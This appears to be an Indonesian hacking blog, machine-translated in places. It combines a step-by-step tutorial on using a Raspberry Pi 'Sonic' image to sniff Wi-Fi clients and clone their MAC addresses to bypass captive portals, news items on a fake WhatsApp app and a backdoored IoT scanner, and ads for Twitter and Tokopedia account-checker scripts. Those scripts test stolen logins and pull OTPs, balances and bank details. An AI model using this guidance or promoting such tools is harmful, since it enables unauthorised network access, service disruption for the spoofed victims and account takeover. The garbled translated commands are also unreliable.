kamu harus memiliki Kartu nirkabel TL-WN722N TP-Link. Setiap kartu nirkabel dengan chip Atheros juga harus memenuhi rekomendasi ini. Jika Anda tidak yakin chipset yang digunakan kartu nirkabel Anda, lihat tautan di bawah ini untuk rinciannya.

Kita juga memerlukan kartu microSD untuk menyimpan gambar Sonic.

Meskipun bukan persyaratan khusus di situs Sonic, kami juga ingin mengambil baterai yang bagus untuk Pi Raspberry kami. Jika kita benar-benar menginginkan hacking mobile, kita memerlukan solusi yang benar-benar mobile. Saya menguji baterai ini dengan Raspberry Pi 3 B dan bertahan lebih dari 7 jam!





Manfaat utama penggunaan Pi pada sesuatu seperti laptop adalah portabilitas dan diam-diam. Sementara laptop dengan beberapa antena mencuat terlihat cukup mencurigakan, seseorang yang menggunakan The Sonic tampaknya tidak melakukan apa-apa selain memeriksa telepon mereka.

Sekarang setelah kita mendapatkan perangkat kerasnya, kita perlu mendapatkan beberapa perangkat lunak yang sesuai. Untuk perangkat seluler, kami perlu memastikan bahwa kami memiliki browser web Google Chrome. Safari di iPhone tidak mendukung fungsi JavaScript yang digunakan Sonic, jadi kami memerlukan Google Chrome untuk mengaksesnya dengan benar.


2.Downloading & Burning the Sonic Image


Anda bisa mendownload file IMG untuk The Sonic dari sini. Gambar akan dikirim dalam bentuk arsip ZIP 2.1 GB, yang harus Anda ekstrak. Setelah Anda unzip gambar, ukuran total akan menjadi sekitar 16 GB, jadi sadarlah Anda sedang bekerja dengan beberapa file yang cukup besar.

Karena berkasnya sangat besar, sebaiknya verifikasi integritasnya. Anda dapat melakukan ini dengan memeriksa nilai hash untuk file yang didownload dan membandingkannya dengan yang ditunjukkan pada halaman download situs web. FCIV adalah alat baris perintah yang mudah digunakan untuk Windows untuk menghitung nilai hash. Untuk Linux, Anda bisa menggunakan perintah md5sum, dan pengguna Mac bisa menggunakan perintah md5.


The hash checksums untuk file .zip dapat ditemukan di situs The Sonic.

Begitu Anda memiliki gambar, langkah-langkah untuk flash ke kartu microSD bervariasi tergantung pada sistem operasi Anda. Temukan sistem operasi Anda di bawah dan ikuti langkah-langkah yang diperlukan.


Pada Windows


Agar flash image Sonic di Windows, kita butuh software tambahan. Win32 Disk Imager akan membiarkan kita memilih file gambar, pilih perangkat apa yang ingin kita tulis, dan akhirnya jaga sisanya untuk kita.


Di Mac & Linux


Pertama, kita perlu mencari tahu perangkat disk yang terhubung mana yang mewakili kartu SD. Ini bisa dilakukan dengan menjalankan lsblk di Linux, atau daftar diskutil di macos. Selanjutnya, kita perlu meng-unmount perangkat via umount (disklocation) di Linux, atau diskutil unmount / dev / device di macos. Akhirnya, kami menulis gambar ke kartu SD dengan perintah berikut.


dd if = theImageFile.img dari = / dev / device bs = 4m


Setelah script itu digunakan, masukkan ke dalam Pi Raspberry Anda.


3.Connecting ke Sonic

Sekarang saatnya untuk memulai Sonic kita!

Sebuah catatan singkat sebelum kita melanjutkan: Sonic diprogram untuk secara otomatis mengkonfigurasi file Linux yang diperlukan untuk membuat jalur akses. Untuk melakukan ini, Pi akan restart sendiri satu atau dua kali. Ini benar-benar normal.

Selama proses ini, Sonic menugaskan kartu Wi-Fi internal Raspberry Pi Anda ke nama antarmuka khusus sehingga bisa menjalankan jalur akses. Setelah itu, Sonic akan menjalankan beberapa skrip startup untuk mengkonfigurasi access point, mengaktifkan SSH login, dan menjalankan aplikasi web.

Colokkan adaptor jaringan nirkabel Anda ke dalam Pi Raspberry, dan pasang Pi dengan menghubungkannya ke sumber listrik melalui kabel listrik Micro USB.

Setelah Pi selesai mengatur dirinya sendiri, ia akan memulai jalur akses built-in. Secara default, SSID adalah The Sonic dan kata sandinya adalah password. Sudah pasti ide bagus untuk mengubah ini pada suatu saat. Hal ini dapat dilakukan dengan membuka tab "Pengelola AP" di aplikasi web Sonic, yang akan kami lihat segera.





4.Troubleshooting Masalah dengan Sonic

Jika Anda tidak melihat jalur akses yang bernama "The Sonic" setelah 15 menit, ada beberapa hal yang harus diperiksa.

Pertama, matikan Sonic Anda, hubungkan ke monitor, dan nyalakan kembali. Kami ingin memeriksa dan melihat apakah perangkat sedang boot normal, atau jika ada masalah seperti lingkaran reboot atau pesan kesalahan yang tidak terbatas.

Jika perangkat terjebak dalam lingkaran reboot yang tidak terbatas, atau Anda mendapati pesan kesalahan sedang membaca "link wlan0 belum siap" untuk selamanya, mungkin ada masalah dengan driver yang terkait dengan adaptor jaringan nirkabel tertentu Anda. Jika Anda memiliki adaptor nirkabel lain yang tersedia, coba beralih ke kartu itu.

Jika tidak, coba cabut kartu dan booting Sonic tanpa antarmuka eksternal. Setelah berhasil boot dengan benar, periksa apakah driver untuk kartu nirkabel Anda terpasang. Anda bisa mengetahui driver apa yang diinstal dengan mengetikkan yang berikut.





lspci | grep -i wireless


Jika driver untuk kartu nirkabel Anda tidak terpasang, langkah-langkah untuk penginstalan bervariasi. Kunjungi situs web produsen untuk mengetahui cara menginstal driver yang diperlukan untuk Debian Linux.

Jika berhasil boot dengan berhasil, tapi Anda tidak dapat melihat jalur akses yang disebut "The Sonic", coba hubungkan keyboard dan jalankan yang berikut.


ifconfig


Cek apakah kedua kartu Wi-Fi terdeteksi, dan jika sebuah antarmuka bernama "wap0" ada. Jika Anda tidak dapat menemukan sebuah antarmuka bernama "wap0," ketik berikut ini.


/var/www/html/scripts/ifaceChecker.py


Ini akan menjalankan skrip yang memeriksa keadaan saat ini dari antarmuka Wi-Fi Raspberry Pi built-in. Jika tidak dapat menemukan antarmuka, mungkin ada masalah dengan kartu Wi-Fi built-in di Raspberry Pi Anda.

Dalam hal ini, coba gunakan Pi Raspberry kedua jika Anda cukup beruntung memiliki yang lain, atau periksa kembali kartu Wi-Fi dengan gambar Raspberry Pi yang berbeda seperti Raspbian dan monitor.

Jika tidak ada yang di atas tampaknya membantu, mungkin ada kesalahan saat pertama kali mencitrakan kartu SD Anda. Coba pencitraan ulang kartu juga. Anda juga bisa melihat dokumentasi di website disini.


5.Menggunakan Sonic

Begitu kita terhubung, dunia ini tiram kita! Nah, paling tidak bagian dunia dengan kelemahan keamanan serius. Sebelum kita melakukan apapun, kita akan ingin terhubung ke Wi-Fi, karena koneksi saat ini tidak akan melayani data ke telepon kita atau Pi. Syukurlah, Sonic memiliki aplikasi web built-in yang membuat tugas terminal yang membosankan seperti itu sangat sepele.

Secara default, aplikasi web terletak di 192.168.8.1. Cukup tekan alamat itu ke browser pada ponsel cerdas Anda, dan Anda akan disambut dengan sebuah prompt untuk nama pengguna, dan kemudian sebuah kata sandi. Secara default, username adalah sonik dan password adalah password.




Setelah Anda selesai melakukannya, menu utama akan muncul seperti yang terlihat di sisi kiri bawah. Desain menu pasti dasar, tapi to the point. Dengan mengetuk "Pengelola Wifi", kami dapat dengan cepat mencantumkan poin Wi-Fi di sekitar kami (terlihat di sisi kanan).





Jalur akses yang kita lihat terdaftar dengan kekuatan sinyal. Dalam contoh ini, semua jalur akses dengan "(Open)" adalah bagian dari jaringan Wi-Fi yang tidak memiliki kata sandi, namun memerlukan otentikasi melalui portal web untuk digunakan.

Sayangnya, kami tidak memiliki kredensial. Namun menjadi hacker pintar kita kita, kita masih bisa mendapatkan akses pula.


6.Mendapatkan Akses ke Jaringan

Agar bisa melewati otentikasi berbasis web untuk jaringan ini, pertama-tama kita perlu memahami bagaimana otentikasi melacak penggunanya. Sama seperti situs web tertentu yang menggunakan cookies untuk melakukan pra-otentikasi pengguna yang telah masuk, jenis jaringan ini mencatat alamat MAC klien untuk melacak apakah perangkat tersebut diotorisasi atau tidak.

Jadi yang perlu kita lakukan adalah mencari alamat MAC dari client yang sudah terkoneksi. Sonic membuat proses ini sangat mudah bagi kita. Jika kita kembali ke aplikasi web, kita bisa menemukan beberapa fitur bagus.

Di Wifi Manager, mari ketuk tombol untuk jaringan yang ingin kita masuki. Kita akan disambut dengan layar yang mirip dengan yang ada di sebelah kiri bawah. Di sini kita melihat beberapa pilihan: Kita dapat terhubung ke jaringan atau melakukan sniffing nirkabel dan melihat semua klien yang terhubung ke jaringan. Tentu saja, kami ingin mengintip, jadi kami mengetuk "List Connected Devices."

Setelah mengetuk tombol ini, Sonic akan membuka tab baru yang akan mulai memindai perangkat yang terhubung. Pada dasarnya, proses latar belakang yang menjalankan Airodump-ng dari suite Aircrack-ng akan memproses output dan menunjukkan hasilnya kepada kami. Proses ini memakan waktu sekitar 33 detik untuk dimuat, jadi Anda harus bersabar.




Fitur ini saat ini satu-satunya yang tidak bekerja di browser Safari. Safari tidak mendukung fungsi tab baru JavaScript yang digunakan Sonic. Rencana ada di tempat untuk memberikan dukungan kepada Safari setelah fitur tambahan telah dilaksanakan.





7.Mengubah Alamat MAC kami

Setelah aplikasi web selesai dimuat, kami akan diberi daftar alamat MAC klien. Dengan mengetuk saja, kami akan dikirim ke halaman MAC Changer dimana semua data yang diperlukan akan dikirim untuk menetapkan alamat MAC baru dari perangkat kami. Sekarang, yang harus kita lakukan adalah kembali ke Wifi Manager dan langsung terhubung. Kita seperti Flynn!

Perlu dicatat bahwa dengan melakukan ini, kemungkinan besar Anda akan mengganggu layanan siapa pun perangkat yang Anda masam sebagai miliknya. Dengan pemikiran ini, serangannya tidak benar-benar tersembunyi.

Tapi menyingkirkannya, sekarang kita bisa terhubung ke jaringan, sebenarnya tidak banyak yang tidak bisa kita lakukan. Sonic diatur untuk mengarahkan jalur akses Wi-Fi built-innya melalui jalur akses yang terhubung ke internet agar terhubung ke internet. Ini berarti Anda masih bisa mengakses internet dari telepon Anda, begitu The Sonic terhubung ke jalur akses terdekat.

Dari sini, kita memiliki kemampuan untuk mengendus lalu lintas lokal, menipu server DNS, menjalankan eksploitasi pada perangkat jaringan, dan hal lain yang dapat Anda lakukan dari laptop atau desktop Kali Linux. Keindahan The Sonic adalah betapa portabel dan tersembunyi perangkat ini.

Memulai & Melepaskan Your Inner Hacker
Sekali lagi, sementara proyek ini masih sangat baru, dasar The Sonic membuatnya menjadi alat hack and plug-and-play seperti tidak lain. Sonic sedang aktif dipertahankan sekarang, dan fitur baru ditambahkan ke aplikasi web agar lebih intuitif dan mudah digunakan.

Jika Anda ingin dapat menggunakan The Sonic secara maksimal, Anda harus menguasai dulu Kali Linux.

Saturday, November 11, 2017

Update whatsapp ternyata Ulah hacker yang memalsukannya



Cybercriminals dikenal untuk memanfaatkan semua hal yang populer di kalangan orang-orang untuk menyebarkan malware, dan Google Play Play resmi selalu membuktikan tidak kurang dari tempat yang sangat baik bagi peretas untuk menyelesaikan pekerjaan mereka.

Kemarin beberapa pengguna melihat versi palsu dari aplikasi pesan WhatsApp paling populer untuk Android di Google Play Store resmi yang telah menipu lebih dari satu juta pengguna untuk mendownloadnya.

Dijuluki Update WhatsApp Messenger, berasal dari pengembang aplikasi yang berpura-pura menjadi layanan WhatsApp aktual dengan judul pengembang "WhatsApp Inc." - judul yang sama dengan pengguna utusan WhatsApp yang sebenarnya di Google Play.

Anda mungkin bertanya-tanya bagaimana pengembang aplikasi licik dapat menggunakan judul yang sama dengan pembuat pesan perpesanan yang sah milik Facebook - berkat ruang karakter Unicode.

Pembuat aplikasi menambahkan ruang karakter Unicode setelah nama WhatsApp Inc. yang sebenarnya, yang dalam kode komputer berbunyi WhatsApp + Inc% C2% A0.

Namun, ruang karakter tersembunyi ini di akhir Inc WhatsApp akan mudah terlihat oleh pengguna Android rata-rata yang menjelajahi Google Play Store, sehingga versi aplikasi yang cerdik ini menyamar sebagai produk WhatsApp Inc.

Dengan kata lain, judul yang digunakan oleh pembuat aplikasi palsu dan layanan WhatsApp sebenarnya berbeda namun serupa dengan pengguna.

Menurut Redditors, yang pertama kali melihat aplikasi palsu ini pada hari Jumat, aplikasi itu bukan aplikasi obrolan; Sebagai gantinya, ia menyajikan pengguna Android dengan iklan untuk mendownload aplikasi lainnya.




"Saya juga telah memasang aplikasi dan mendekompilasi," kata Redditor. "Aplikasi itu sendiri memiliki izin minimal (akses internet) namun pada dasarnya adalah pembungkus iklan yang memiliki beberapa kode untuk mengunduh aplikasi kedua, yang juga disebut 'whatsapp.apk'. Aplikasi ini juga mencoba untuk menyembunyikan dengan tidak memiliki judul dan memiliki ikon kosong. "

Google sekarang telah menghapus aplikasi Android WhatsApp palsu dari Play Store resminya, namun insiden ini sekali lagi menandai kegagalan raksasa teknologi untuk menemukan penipuan di platform aplikasinya-bahkan untuk program yang memiliki lebih dari satu juta unduhan.

Ini adalah kebenaran yang tidak menguntungkan yang bahkan setelah banyak usaha oleh Google (bahkan baru-baru ini meluncurkan Bug Bounty Program), aplikasi berbahaya terus berupaya mengelabui mekanisme keamanan Play Store-nya dan menginfeksi jutaan pengguna Android.

Google Play Store masih dikelilingi oleh ratusan aplikasi palsu dan berbahaya lainnya yang mengelabui pengguna agar mengunduh dan memasangnya dan berpotensi menginfeksi ponsel cerdas mereka untuk melakukan hal-hal berbahaya tanpa sepengetahuan mereka.

Jadi, pengguna disarankan untuk lebih waspada saat mengunduh aplikasi tidak hanya dari toko aplikasi pihak ketiga, tetapi juga dari Play Store resmi untuk melindungi diri mereka sendiri.

Hati hati dengan Skrip Scanning Kerentanan Backdoor IoT memindai anda




Jika Anda mencari alat hacking gratis di Internet, maka berhati-hatilah-alat yang paling banyak tersedia.

Sebagai contoh, RAT Cobian dan alat hacking Facebook yang sebelumnya kami laporkan di Hacker News benar-benar bisa hack, tapi dari orang yang menggunakannya dan bukan yang Anda inginkan untuk hack.

Sekarang, seorang peneliti keamanan telah melihat alat hacking lainnya - kali ini sebuah skrip PHP - yang tersedia secara bebas di beberapa forum hacking populer di drakweb dan memungkinkan seseorang untuk menemukan IP Camera yang terhubung dengan internet yang rentan yang menjalankan versi rentan dari server web GoAhead yang tertanam.

Namun, setelah menganalisis skrip scanning dengan seksama, peneliti Security Newsky Ankit Anubhav menemukan bahwa alat ini juga berisi backdoor rahasia, yang pada dasarnya memungkinkan penciptanya untuk "hack pengguna script tersebut"

"Untuk sudut pandang penyerang, bisa sangat bermanfaat untuk hacker," kata Anubhav.

"Misalnya, jika script kiddie memiliki botnet 10.000 IoT dan jika dia di hack, seluruh botnet sekarang mengendalikan penyerang yang menguasai sistem script kiddie ini. Oleh karena itu, dengan memanfaatkan satu perangkat, dia bisa tambahkan ribuan botnet ke tentaranya. "

Maraknya botnet IoT dan pelepasan kode sumber Mirai - ancaman malware berbasis IoT terbesar yang muncul tahun lalu dan menurunkan layanan Dyn DNS - telah mendorong hacker kriminal untuk membuat botnet besar baik untuk meluncurkan serangan DDoS terhadap target mereka atau untuk menyewa mereka untuk mendapatkan uang

Seperti ditunjukkan pada bagan alur penjelasan, skrip pemindaian IoT ini bekerja dalam empat tahap:

Pertama, ia memindai satu set alamat IP untuk menemukan server GoAhead yang rentan terhadap kerentanan bypass otentikasi yang diungkapkan sebelumnya (CVE-2017-8225) pada perangkat WIFI CAM Wireless Camera (P2P).

Di latar belakang, secara diam-diam membuat akun pengguna backdoor (nama pengguna: VM | password: Meme123) pada sistem hacker wannabe, yang memberi hak istimewa penyerang sebagai root.

Script juga mengekstrak alamat IP dari hacker wannabe, yang memungkinkan penulis naskah mengakses sistem yang dikompromikan dari jarak jauh.

Selain itu, ia juga menjalankan payload lain pada sistem script kiddie, yang akhirnya menginstal botnet yang terkenal, dijuluki Kaiten.

Alat ini adalah contoh lain dari alat hacking backdoor yang semakin banyak didistribusikan di berbagai forum darkweb untuk para hacker.

Pada bulan September, kit pembangun Cobian RAT yang dibelaki banyak ditemukan di beberapa forum hacking drakweb secara gratis namun tertangkap berisi modul backdoor yang bertujuan untuk memudahkan pengakses kit tersebut terhadap semua data korban.

Tahun lalu, kami melaporkan tentang alat hacking Facebook lainnya, yang dijuluki Remtasu, yang sebenarnya adalah Trojan berbasis Windows dengan kemampuan untuk mengakses kredensial akun Facebook, namun juga orang yang menggunakannya untuk hack orang lain.

Intinya: Hati-hati dengan barang online gratis dengan sangat hati-hati sebelum menggunakannya.

Wednesday, November 1, 2017

Script Checker akun twitter terbaru




script Checker akun twetter terbaru ..
kali ini saya akan memberikan kalian sebuah alat Checker akun terbaru ,,

Fitur Twitter Checker :
- Check Login
- Check Name
- Check Follower
- Check Following


jangan lupa baca juga artikel kami :





mau mencoba silakan download di link di bawah ini 



SEGALA SESUATU YANG KALIAN DAPATKAN DI SITUS KAMI INI.
KAMI TIDAK BERTANGGUNG JAWAB APABILA ADA PENYALAGUNAAN

Script chacker akun tokopedia terbaru



ScreenShot SC Tokopedia Account Checker Pas Lagi Eror :3 
Sekarang Sudah Fresh Aman Pakai Script + No Log !

Fitur Tokopedia Account Checker Ini :
- Check Login Email Password
- Check OTP
- Check Saldo Account Tokopedia
- Check Point Yang Di Dapat Di Tokopedia
- Cex Nomor HeadPhone Account
- Cex Alamat Yang Di Masukan Oleh Pemilik Akun Di Toped
- Check Bank Account Tokopedia Tersebut 

DOWNLOAD SERVER 1 = DISINI
DOWNLOAD SERVER 2 = DISINI

Untuk mendapatkan Password sebutkan nama file yang akan diperlukan Password ke PM FB: geral niuss 

SELAMAT MENCOBA GUNAKAN DENGAN BIJAK.
SEGALA SESUATU YANG ANDA DAPATKAN DI WEBSITE INI , KAMI TIDAK BERTANGGUNG JAWAB.